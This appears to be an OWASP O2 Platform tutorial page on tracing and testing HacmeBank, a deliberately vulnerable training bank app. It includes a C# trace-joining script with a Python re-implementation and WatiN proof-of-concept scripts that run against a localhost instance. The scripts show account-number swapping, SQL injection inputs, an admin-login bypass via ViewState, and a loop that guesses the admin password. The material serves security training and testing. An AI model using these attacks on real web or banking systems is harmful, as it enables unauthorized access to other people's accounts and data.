Using O2 Platform and HacmeBank
Michael from the OWASP Costa Rica chapter wrote a great article about O2 and his first use of it to automate HacmeBank's login sequence: Starting with OWASP O2 Platform: a short step in a long journey
In reply I wrote Using O2 with HacmeBank, which gives an overview of what you can do today with O2 + HacmeBank (and ideas for where to go next).
O2 .NET AST Scanner – HacmeBank – SQL Injection PoC
This example shows a complete trace for one of HacmeBank's SQL injection vulnerabilities.
It was created with O2's .NET AST Scanner (23-May-10 version), which allows a complete trace to be built by 'joining up' the partial traces (one for the web layer and one for the web services layer).
Graph with Big Picture (all nodes)

Part 1 – Exploit/Payload location

Part 2 – Web Layer trace

Part 3 – WebServices trace

Script used to ‘join’ the two traces
// add payload and link it to the first node
var urlNode = "http://127.0.0.1:57096/HacmeBank_v2_Website/aspx/login.aspx";
var postPayload = "POST payload: txtUserName";
graph.add_Node(urlNode);
graph.add_Node(postPayload);
graph.add_Edge(urlNode, postPayload);
graph.add_Edge(postPayload, graph.nodes()[0]);
// join traces that match the "method.*Ws_UserManagement.Login" reg ex
// with a new node called "INTERNET"
var internetNode = "INTERNET";
graph.add_Node(internetNode);
foreach(var node in graph.nodes())
    if(node.str().regEx("method.*Ws_UserManagement.Login"))
    {
        graph.add_Edge(internetNode, node);
        graph.add_Edge(node, internetNode);
    }
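To show the joining logic outside O2, here is an added Python example (not O2's code): it builds the same kind of graph from two constructed partial traces, links the regex-matched nodes through an INTERNET node the way the script above does, and then walks the joined graph for a payload-to-sink path. The trace node names are constructed and are not HacmeBank's real scanner output.

```python
import re
from collections import deque

# Constructed sample traces (not real HacmeBank scanner output); each list is one
# partial trace ordered from source to sink within its layer.
WEB_LAYER_TRACE = [
    "param: txtUserName.Text",
    "method: Login.btnSubmit_Click",
    "method: WebServiceProxy.Ws_UserManagement.Login",  # call leaves the web layer
]
WEBSERVICES_TRACE = [
    "method: Ws_UserManagement.Login",  # entry point on the web services side
    "method: UserManagement.LoginUser",
    "sink: SqlCommand.ExecuteReader",
]
JOIN_REGEX = re.compile(r"method.*Ws_UserManagement\.Login")  # same reg ex as the O2 script

def build_graph(*traces):
    """Directed adjacency map; consecutive nodes of each trace become edges."""
    graph = {}
    for trace in traces:
        for node in trace:
            graph.setdefault(node, set())
        for src, dst in zip(trace, trace[1:]):
            graph[src].add(dst)
    return graph

def join_traces(graph, pattern, join_node="INTERNET"):
    """Link every regex-matched node to and from a shared join node, so the two
    layers become one connected trace (mirrors the page's INTERNET node)."""
    graph.setdefault(join_node, set())
    for node in list(graph):
        if node != join_node and pattern.search(node):
            graph[join_node].add(node)
            graph[node].add(join_node)
    return graph

def find_path(graph, start, goal):
    """Breadth-first search for the shortest start-to-goal path; None if unreachable."""
    queue, seen = deque([[start]]), {start}
    while queue:
        path = queue.popleft()
        if path[-1] == goal:
            return path
        for nxt in graph.get(path[-1], ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(path + [nxt])
    return None

def complete_trace():
    """Payload node in front of the first web-layer node, then join and search."""
    graph = build_graph(WEB_LAYER_TRACE, WEBSERVICES_TRACE)
    payload = "POST payload: txtUserName"
    graph.setdefault(payload, set()).add(WEB_LAYER_TRACE[0])
    join_traces(graph, JOIN_REGEX)
    return find_path(graph, payload, "sink: SqlCommand.ExecuteReader")
```

Without the join step the two traces are disconnected and no payload-to-sink path exists, which is exactly the gap the INTERNET node closes.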
Source Code view of Web Layer code and trace



Source Code view of Web Services code and trace




HacmeBank – Unit Tests for Vulnerabilities
The following examples show how to create automated exploits and PoCs (to be later transformed into unit tests) for HacmeBank's vulnerabilities.
This code uses O2's WatiN integration, which provides an easy 'IE automation' scripting environment.
Install and confirm we can log in
After installing HacmeBank, run the following script, which confirms that we can log in:
// open a blank IE window ("about:black" on the original page is a typo for "about:blank")
var ie = "about:blank".ie(0,500,750,500);
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
Vulnerability: User A is able to see User B's account details
var ie = "about:blank".ie(0,500,750,500);
ie.open("http://localhost:58348/HacmeBank_v2_Website");
ie.field("txtUserName").value("jm");
ie.field("txtPassword").value("jm789");
ie.button("Submit").click();
ie.link("My Accounts").click();
ie.link("View Transactions").click();
// the account number is carried in the query string; swap it for another account's
var url = ie.url();
var payload = url.replace("5204320422040003","5204320422040001");
ie.open(payload);
ie.closeInNSeconds(20);
Vulnerability: SQL Injection in Login page
[Test]
public void vulnerability_Sql_Injection_in_Login_page()
{
    setup();
    Browser.open(StartUrl);
    Browser.field("txtUserName").value("jv ' aaa").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
}
Vulnerability: SQL Injection in Accounts Details page
[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
    setup();
    Browser.open(StartUrl);
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
    Browser.link("My Accounts").flash().click();
    Browser.link("View Transactions").flash().click();
    Browser.open(Browser.url()+"' AAAAA ");
}
Vulnerability: Sensitive Information Disclosure in Admin Section Login
[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
    setup();
    Browser.open(StartUrl);
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").click();
    Browser.link("Admin Section").flash().click();
    // the expected response is exposed in the page's ViewState
    var response = Browser.viewState().ViewState_Values[12];
    Browser.field("_ctl3:txtResponse").value(response).flash();
    Browser.button("Login").flash().click();
}
Script: Fuzzing Admin password
panel.clear();
var topPanel = panel.add_Panel();
var ie = topPanel.add_IE().silent(true);
var startPage = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";
Action<string> adminLogin =
    (password)=>{
        ie.open(startPage);
        ie.disableFlashing();
        ie.field("txtUserName").value("jv").flash();
        ie.field("txtPassword").value("jv789").flash();
        ie.button("Submit").click();
        ie.link("Admin Section").flash().click();
        //var secret = ie.viewState().ViewState_Values[12];
        ie.field("_ctl3:txtResponse").value(password);
        ie.button("Login").click();
        //Add logic to detect admin Login
    };
for(int i = 0; i < 10; i++)
    adminLogin("admin" + i);
//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll